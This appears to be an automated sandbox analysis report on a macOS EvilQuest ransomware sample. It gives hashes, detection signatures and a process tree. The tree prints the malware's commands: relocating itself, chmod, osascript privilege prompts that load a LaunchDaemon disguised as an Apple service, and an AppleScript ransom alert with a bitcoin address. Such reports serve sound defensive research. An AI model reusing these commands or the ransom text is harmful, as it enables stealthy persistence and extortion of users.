Loading ...

Play interactive tourEdit tour

Analysis Report Nt7gLoFlYn

Overview

General Information

Sample Name:Nt7gLoFlYn (renamed file extension from none to dmg)
Analysis ID:106234
MD5:58680abd58baca826c2029f32e5b78b3
SHA1:98040c4d358a6fb9fed970df283a9b25f0ab393b
SHA256:b34738e181a6119f23e930476ae949fc0c7c4ded6efa003019fa946c4e5b287a

Most interesting Screenshot:

Detection

EvilQuest
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Detected macOS EvilQuest ransomware
Yara detected EvilQuest Ransomware
Contains functionality related to in-memory code execution
Contains functionality related to key logging
Contains symbols with suspicious names likely related to anti-analysis
Contains symbols with suspicious names likely related to privilege escalation
Creates hidden Mach-O files
Deletes many files in the user directory
Denies being traced/debugged (via ptrace PT_DENY_ATTACH)
Executes shell scripts with administrative rights
Executes the "sudo" command used to execute a command as another user
Might steal keychain information which contains credentials
Moves itself during installation or deletes itself after installation
Reads local browser cookies
Reads process information of other processes
Writes Mach-O files to untypical directories
Changes permissions of written Mach-O files
Contains symbols with suspicious names likely related to encryption
Contains symbols with suspicious names likely related to networking
Contains symbols with suspicious names likely related to well-known browsers
Creates 'launchd' managed services aka launch agents with bundle ID names to possibly disguise malicious intentions
Creates application bundles
Creates code signed application bundles
Creates hidden files, links and/or directories
Creates memory-persistent launch services
Creates system-wide 'launchd' managed services aka launch daemons
Creates user-wide 'launchd' managed services aka launch agents
Executes Apple scripts and/or other OSA language scripts with shell command 'osascript'
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "mkdir" command used to create folders
Executes the "security_authtrampoline" command used to authorize execution with root privileges (GUI prompt)
Explicitly loads/starts launch services
HTTP GET or POST without a user agent
Many shell processes execute programs via execve syscall (might be indicative for malicious behavior)
Reads hardware related sysctl values
Reads launchservices plist files
Reads the sysctl safe boot value (probably to check if the system is in safe boot mode)
Reads the systems OS release and/or type
Reads the systems hostname
Reads user launchservices plist file containing default apps for corresponding file types
Uses AppleScript framework/components containing Apple Script related functionalities
Uses AppleScript scripting additions containing additional functionalities for Apple Scripts
Uses CFNetwork bundle containing interfaces for network communication (HTTP, sockets, and Bonjour)
Uses Security framework containing interfaces for system-level user authentication and authorization
Writes 64-bit Mach-O files to disk
Writes RTF files to disk
Writes a file containing only its PID

Classification

Startup

  • system is mac-mojave
  • Installer (MD5: 93dd388d90b35bc29b3f6cd499ace778) Arguments: /System/Library/CoreServices/Installer.app/Contents/MacOS/Installer
  • installd (MD5: c94a70b5dcbe257244d585c24b6073bb) Arguments: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
    • shove New Fork (PID: 750, Parent: 735)
    • postinstall New Fork (PID: 751, Parent: 735)
      • sh New Fork (PID: 752, Parent: 751)
      • mkdir (MD5: 0948c3e8dfd7f3d3628ca8b819092ccf) Arguments: mkdir /Library/mixednkey
      • sh New Fork (PID: 753, Parent: 751)
      • mv (MD5: 71b4f7c9a383f7c62c738273039ba658) Arguments: mv /Applications/Utils/patch /Library/mixednkey/toolroomd
      • sh New Fork (PID: 754, Parent: 751)
      • rmdir (MD5: a900434ad49b67ad1b43d3dc47fe74ef) Arguments: rmdir /Application/Utils
      • sh New Fork (PID: 755, Parent: 751)
      • chmod (MD5: d7df83ea3a49de5d07e0c1730e910852) Arguments: chmod +x /Library/mixednkey/toolroomd
      • sh New Fork (PID: 756, Parent: 751)
      • toolroomd (MD5: 322f4fb8f257a2e651b128c41df92b1d) Arguments: /Library/mixednkey/toolroomd
        • sh New Fork (PID: 763, Parent: 756)
        • osascript (MD5: bec2959dde44c809741cf5069e08bf0f) Arguments: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
          • security_authtrampoline (MD5: f55206da7dd9b6699ecb7e3e8ce994f7) Arguments: /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 10 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
          • uid (MD5: cb71c60e99e14478dede15b269f4517f) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
          • uid (MD5: cb71c60e99e14478dede15b269f4517f) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
          • sh (MD5: 348affb69862798fd7b2f8874437f649) Arguments: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
            • sh New Fork (PID: 765, Parent: 764)
            • launchctl (MD5: 3e04cf4fe184467aa2dbf4e4d5c72f3d) Arguments: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
            • sh New Fork (PID: 767, Parent: 764)
            • launchctl (MD5: 3e04cf4fe184467aa2dbf4e4d5c72f3d) Arguments: launchctl start questd
        • sh New Fork (PID: 769, Parent: 756)
        • osascript (MD5: bec2959dde44c809741cf5069e08bf0f) Arguments: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
          • security_authtrampoline (MD5: f55206da7dd9b6699ecb7e3e8ce994f7) Arguments: /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 15 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
          • uid (MD5: cb71c60e99e14478dede15b269f4517f) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
          • uid (MD5: cb71c60e99e14478dede15b269f4517f) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
          • sh (MD5: 348affb69862798fd7b2f8874437f649) Arguments: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
            • sh New Fork (PID: 771, Parent: 770)
            • launchctl (MD5: 3e04cf4fe184467aa2dbf4e4d5c72f3d) Arguments: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
            • sh New Fork (PID: 772, Parent: 770)
            • launchctl (MD5: 3e04cf4fe184467aa2dbf4e4d5c72f3d) Arguments: launchctl start questd
        • sh New Fork (PID: 773, Parent: 756)
        • osascript (MD5: bec2959dde44c809741cf5069e08bf0f) Arguments: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
          • security_authtrampoline (MD5: f55206da7dd9b6699ecb7e3e8ce994f7) Arguments: /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 17 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
          • uid (MD5: cb71c60e99e14478dede15b269f4517f) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
          • uid (MD5: cb71c60e99e14478dede15b269f4517f) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
          • sh (MD5: 348affb69862798fd7b2f8874437f649) Arguments: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
            • sh New Fork (PID: 775, Parent: 774)
            • launchctl (MD5: 3e04cf4fe184467aa2dbf4e4d5c72f3d) Arguments: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
            • sh New Fork (PID: 776, Parent: 774)
            • launchctl (MD5: 3e04cf4fe184467aa2dbf4e4d5c72f3d) Arguments: launchctl start questd
        • sh New Fork (PID: 777, Parent: 756)
        • osascript (MD5: bec2959dde44c809741cf5069e08bf0f) Arguments: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
          • security_authtrampoline (MD5: f55206da7dd9b6699ecb7e3e8ce994f7) Arguments: /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 18 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
          • uid (MD5: cb71c60e99e14478dede15b269f4517f) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
          • uid (MD5: cb71c60e99e14478dede15b269f4517f) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
          • sh (MD5: 348affb69862798fd7b2f8874437f649) Arguments: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
            • sh New Fork (PID: 779, Parent: 778)
            • launchctl (MD5: 3e04cf4fe184467aa2dbf4e4d5c72f3d) Arguments: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
            • sh New Fork (PID: 780, Parent: 778)
            • launchctl (MD5: 3e04cf4fe184467aa2dbf4e4d5c72f3d) Arguments: launchctl start questd
        • sh New Fork (PID: 797, Parent: 756)
        • osascript (MD5: bec2959dde44c809741cf5069e08bf0f) Arguments: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
          • security_authtrampoline (MD5: f55206da7dd9b6699ecb7e3e8ce994f7) Arguments: /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 18 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
          • uid (MD5: cb71c60e99e14478dede15b269f4517f) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
          • uid (MD5: cb71c60e99e14478dede15b269f4517f) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
          • sh (MD5: 348affb69862798fd7b2f8874437f649) Arguments: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
            • sh New Fork (PID: 799, Parent: 798)
            • launchctl (MD5: 3e04cf4fe184467aa2dbf4e4d5c72f3d) Arguments: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
            • sh New Fork (PID: 800, Parent: 798)
            • launchctl (MD5: 3e04cf4fe184467aa2dbf4e4d5c72f3d) Arguments: launchctl start questd
        • sh New Fork (PID: 801, Parent: 756)
        • osascript (MD5: bec2959dde44c809741cf5069e08bf0f) Arguments: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
          • security_authtrampoline (MD5: f55206da7dd9b6699ecb7e3e8ce994f7) Arguments: /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 18 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
          • uid (MD5: cb71c60e99e14478dede15b269f4517f) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
          • uid (MD5: cb71c60e99e14478dede15b269f4517f) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
          • sh (MD5: 348affb69862798fd7b2f8874437f649) Arguments: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
            • sh New Fork (PID: 803, Parent: 802)
            • launchctl (MD5: 3e04cf4fe184467aa2dbf4e4d5c72f3d) Arguments: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
            • sh New Fork (PID: 804, Parent: 802)
            • launchctl (MD5: 3e04cf4fe184467aa2dbf4e4d5c72f3d) Arguments: launchctl start questd
        • sh New Fork (PID: 806, Parent: 756)
        • osascript (MD5: bec2959dde44c809741cf5069e08bf0f) Arguments: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
          • security_authtrampoline (MD5: f55206da7dd9b6699ecb7e3e8ce994f7) Arguments: /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 18 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
          • uid (MD5: cb71c60e99e14478dede15b269f4517f) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
          • uid (MD5: cb71c60e99e14478dede15b269f4517f) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
          • sh (MD5: 348affb69862798fd7b2f8874437f649) Arguments: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
            • sh New Fork (PID: 810, Parent: 808)
            • launchctl (MD5: 3e04cf4fe184467aa2dbf4e4d5c72f3d) Arguments: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
            • sh New Fork (PID: 812, Parent: 808)
            • launchctl (MD5: 3e04cf4fe184467aa2dbf4e4d5c72f3d) Arguments: launchctl start questd
        • sh New Fork (PID: 822, Parent: 756)
        • osascript (MD5: bec2959dde44c809741cf5069e08bf0f) Arguments: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
          • security_authtrampoline (MD5: f55206da7dd9b6699ecb7e3e8ce994f7) Arguments: /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 18 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
          • uid (MD5: cb71c60e99e14478dede15b269f4517f) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
          • uid (MD5: cb71c60e99e14478dede15b269f4517f) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
          • sh (MD5: 348affb69862798fd7b2f8874437f649) Arguments: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
            • sh New Fork (PID: 824, Parent: 823)
            • launchctl (MD5: 3e04cf4fe184467aa2dbf4e4d5c72f3d) Arguments: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
            • sh New Fork (PID: 825, Parent: 823)
            • launchctl (MD5: 3e04cf4fe184467aa2dbf4e4d5c72f3d) Arguments: launchctl start questd
        • sh New Fork (PID: 835, Parent: 756)
        • osascript (MD5: bec2959dde44c809741cf5069e08bf0f) Arguments: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
          • security_authtrampoline (MD5: f55206da7dd9b6699ecb7e3e8ce994f7) Arguments: /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 18 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
          • uid (MD5: cb71c60e99e14478dede15b269f4517f) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
          • uid (MD5: cb71c60e99e14478dede15b269f4517f) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
          • sh (MD5: 348affb69862798fd7b2f8874437f649) Arguments: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
            • sh New Fork (PID: 837, Parent: 836)
            • launchctl (MD5: 3e04cf4fe184467aa2dbf4e4d5c72f3d) Arguments: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
            • sh New Fork (PID: 838, Parent: 836)
            • launchctl (MD5: 3e04cf4fe184467aa2dbf4e4d5c72f3d) Arguments: launchctl start questd
        • sh New Fork (PID: 839, Parent: 756)
        • osascript (MD5: bec2959dde44c809741cf5069e08bf0f) Arguments: osascript -e beep 18say 'Your files are encrypted' waiting until completion falseset alTitle to 'Many of your important documents, photos, videos, images and other files are no longer accessible because they have been encrypted.Maybe you are busy looking for a way to recover your files, but do not waste your time. Nobody can recover your files without our decryption service.We guarantee however that you can recover your files safely and easily and this will cost you 50 USD without any additional fees.Our offer is valid FOR 3 DAYS (starting now!). Full details can be found in the file: READ_ME_NOW.txt located on your Desktop'set alText to 'Your files are encrypted'display alert alText message alTitle as critical buttons {'OK'}set the clipboard to '13roGMpWd7Pb3ZoJyce8eoQpfegQvGHHK7'
  • iBooksCacheDelete (MD5: d712c1710db543f2f6000412ed3314b0) Arguments: /Applications/Books.app/Contents/PlugIns/iBooksCacheDelete.appex/Contents/MacOS/iBooksCacheDelete
  • sudo (MD5: 3ad133b223883539638210c984bb92d0) Arguments: sudo /Library/AppQuest/com.apple.questd --silent
    • sudo New Fork (PID: 768, Parent: 766)
    • com.apple.questd (MD5: 322f4fb8f257a2e651b128c41df92b1d) Arguments: /Library/AppQuest/com.apple.questd --silent
      • sh New Fork (PID: 781, Parent: 768)
      • osascript (MD5: bec2959dde44c809741cf5069e08bf0f) Arguments: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
        • security_authtrampoline (MD5: f55206da7dd9b6699ecb7e3e8ce994f7) Arguments: /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 10 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
        • uid (MD5: cb71c60e99e14478dede15b269f4517f) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
        • uid (MD5: cb71c60e99e14478dede15b269f4517f) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
        • sh (MD5: 348affb69862798fd7b2f8874437f649) Arguments: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
          • sh New Fork (PID: 783, Parent: 782)
          • launchctl (MD5: 3e04cf4fe184467aa2dbf4e4d5c72f3d) Arguments: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
          • sh New Fork (PID: 784, Parent: 782)
          • launchctl (MD5: 3e04cf4fe184467aa2dbf4e4d5c72f3d) Arguments: launchctl start questd
      • sh New Fork (PID: 785, Parent: 768)
      • osascript (MD5: bec2959dde44c809741cf5069e08bf0f) Arguments: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
        • security_authtrampoline (MD5: f55206da7dd9b6699ecb7e3e8ce994f7) Arguments: /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 14 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
        • uid (MD5: cb71c60e99e14478dede15b269f4517f) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
        • uid (MD5: cb71c60e99e14478dede15b269f4517f) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
        • sh (MD5: 348affb69862798fd7b2f8874437f649) Arguments: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
          • sh New Fork (PID: 787, Parent: 786)
          • launchctl (MD5: 3e04cf4fe184467aa2dbf4e4d5c72f3d) Arguments: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
          • sh New Fork (PID: 788, Parent: 786)
          • launchctl (MD5: 3e04cf4fe184467aa2dbf4e4d5c72f3d) Arguments: launchctl start questd
      • sh New Fork (PID: 789, Parent: 768)
      • osascript (MD5: bec2959dde44c809741cf5069e08bf0f) Arguments: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
        • security_authtrampoline (MD5: f55206da7dd9b6699ecb7e3e8ce994f7) Arguments: /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 17 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
        • uid (MD5: cb71c60e99e14478dede15b269f4517f) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
        • uid (MD5: cb71c60e99e14478dede15b269f4517f) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
        • sh (MD5: 348affb69862798fd7b2f8874437f649) Arguments: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
          • sh New Fork (PID: 791, Parent: 790)
          • launchctl (MD5: 3e04cf4fe184467aa2dbf4e4d5c72f3d) Arguments: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
          • sh New Fork (PID: 792, Parent: 790)
          • launchctl (MD5: 3e04cf4fe184467aa2dbf4e4d5c72f3d) Arguments: launchctl start questd
      • sh New Fork (PID: 793, Parent: 768)
      • osascript (MD5: bec2959dde44c809741cf5069e08bf0f) Arguments: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
        • security_authtrampoline (MD5: f55206da7dd9b6699ecb7e3e8ce994f7) Arguments: /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 18 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
        • uid (MD5: cb71c60e99e14478dede15b269f4517f) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
        • uid (MD5: cb71c60e99e14478dede15b269f4517f) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
        • sh (MD5: 348affb69862798fd7b2f8874437f649) Arguments: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
          • sh New Fork (PID: 795, Parent: 794)
          • launchctl (MD5: 3e04cf4fe184467aa2dbf4e4d5c72f3d) Arguments: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
          • sh New Fork (PID: 796, Parent: 794)
          • launchctl (MD5: 3e04cf4fe184467aa2dbf4e4d5c72f3d) Arguments: launchctl start questd
      • sh New Fork (PID: 805, Parent: 768)
      • osascript (MD5: bec2959dde44c809741cf5069e08bf0f) Arguments: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
        • security_authtrampoline (MD5: f55206da7dd9b6699ecb7e3e8ce994f7) Arguments: /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 17 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
        • uid (MD5: cb71c60e99e14478dede15b269f4517f) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
        • uid (MD5: cb71c60e99e14478dede15b269f4517f) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
        • sh (MD5: 348affb69862798fd7b2f8874437f649) Arguments: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
          • sh New Fork (PID: 809, Parent: 807)
          • launchctl (MD5: 3e04cf4fe184467aa2dbf4e4d5c72f3d) Arguments: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
          • sh New Fork (PID: 811, Parent: 807)
          • launchctl (MD5: 3e04cf4fe184467aa2dbf4e4d5c72f3d) Arguments: launchctl start questd
      • sh New Fork (PID: 813, Parent: 768)
      • osascript (MD5: bec2959dde44c809741cf5069e08bf0f) Arguments: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
        • security_authtrampoline (MD5: f55206da7dd9b6699ecb7e3e8ce994f7) Arguments: /usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 18 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
        • uid (MD5: cb71c60e99e14478dede15b269f4517f) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
        • uid (MD5: cb71c60e99e14478dede15b269f4517f) Arguments: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
        • sh (MD5: 348affb69862798fd7b2f8874437f649) Arguments: /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
          • sh New Fork (PID: 815, Parent: 814)
          • launchctl (MD5: 3e04cf4fe184467aa2dbf4e4d5c72f3d) Arguments: launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
          • sh New Fork (PID: 816, Parent: 814)
          • launchctl (MD5: 3e04cf4fe184467aa2dbf4e4d5c72f3d) Arguments: launchctl start questd
      • sh New Fork (PID: 831, Parent: 768)
      • osascript (MD5: bec2959dde44c809741cf5069e08bf0f) Arguments: osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
